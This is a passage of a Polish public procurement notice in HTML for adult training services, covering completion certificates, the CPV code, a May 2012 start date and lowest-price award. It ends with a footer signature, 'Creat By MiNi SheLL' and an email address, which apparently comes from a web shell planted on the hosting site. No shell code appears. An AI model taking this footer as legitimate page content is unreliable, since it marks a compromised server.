Wykonawca ma obowiązek wydać uczestnikom po zakończeniu szkolenia zaświadczenia ukończenia szkolenia, zgodne z rozporządzeniem Ministra Edukacji i Nauki w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych z dnia 3 lutego 2006 r. (Dz. U. Nr 31, poz. 216) oraz sporządzić i przekazać Zamawiającemu poświadczone za zgodność z oryginałem kserokopie tych zaświadczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com